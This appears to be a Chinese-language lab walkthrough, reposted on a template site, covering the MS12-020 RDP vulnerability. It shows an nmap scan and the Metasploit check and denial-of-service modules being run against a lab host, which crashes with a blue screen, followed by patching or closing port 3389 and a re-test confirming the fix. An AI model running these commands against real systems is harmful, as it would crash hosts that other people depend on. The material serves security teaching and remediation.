ms12_020(DOS藍(lán)屏攻擊)
1.主機(jī)發(fā)現(xiàn)
使用nmap掃描發(fā)現(xiàn)靶機(jī)開啟3389端口
3389是遠(yuǎn)程桌面服務(wù)端口,ms12_020 RDP(遠(yuǎn)程桌面協(xié)議)遠(yuǎn)程代碼執(zhí)行漏洞
2.使用msfcosole進(jìn)入msf框架
使用search ms12_020查看漏洞
auxiliary/scanner/rdp/ms12_020_check是輔助探索模塊,探測靶機(jī)是否存在漏洞
auxiliary/dos/windows/rdp/ms_12_020_maxchannelids是輔助攻擊模塊,來攻擊靶機(jī)使藍(lán)屏
use auxiliary/scanner/rdp/ms12_020_check 使用輔助探索模塊
使用show options 查看配置信息
Name |
名字 |
Current setting |
當(dāng)前設(shè)置 |
Required |
必填 |
Description |
描述 |
RHOSTS |
靶機(jī)IP(R 是remote的縮寫 遠(yuǎn)程)(host 主機(jī)) |
RPORT |
端口(R遠(yuǎn)程)(PORT端口) |
THREADS |
線程 |
設(shè)置靶機(jī)Ip
Set RHOSTS 172.16.104.250
Run運(yùn)行
The target is vulnerable |
目標(biāo)易攻擊 |
Scanned 1 of 1 host (100% complete) |
已掃描 1 臺(tái)主機(jī)中的 1 臺(tái)(100% 完成) |
Auxiliary module execution completed |
輔助模塊執(zhí)行完成 |
發(fā)現(xiàn)漏洞
使用攻擊模塊
Use auxiliary/dos/windows/rdp/ms_12_020_maxchannelids
使用 show options
設(shè)置靶機(jī)IP
Set RHOSTS 172.16.104.250
Run運(yùn)行
運(yùn)行成功靶機(jī)藍(lán)屏
修復(fù)漏洞
兩種辦法:
- 安裝官方補(bǔ)丁
- 直接關(guān)閉3389端口也就是遠(yuǎn)程連接
關(guān)閉遠(yuǎn)程連接服務(wù)
漏洞修復(fù)后驗(yàn)證
use auxiliary/scanner/rdp/ms12_020_check 使用輔助探索模塊
配置靶機(jī)IP后運(yùn)行
Cannot reliably check exploitability |
無法檢查可利用性(也就是沒發(fā)現(xiàn)漏洞) |
然后使用攻擊模塊
Use auxiliary/dos/windows/rdp/ms_12_020_maxchannelids
查看show options
配置靶機(jī)Ip
Set RHOSTS 172.16.104.250
運(yùn)行run
Running module against |
運(yùn)行模塊 |
RDP service unreachable |
無法訪問RDP服務(wù) |
Auxiliary module execution completed |
輔助模塊執(zhí)行完成 |
文章來源:http://www.zghlxwxcb.cn/news/detail-496269.html
運(yùn)行完成,靶機(jī)沒有藍(lán)屏,證明漏洞修復(fù)文章來源地址http://www.zghlxwxcb.cn/news/detail-496269.html
到了這里,關(guān)于ms12_020(DOS藍(lán)屏攻擊)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!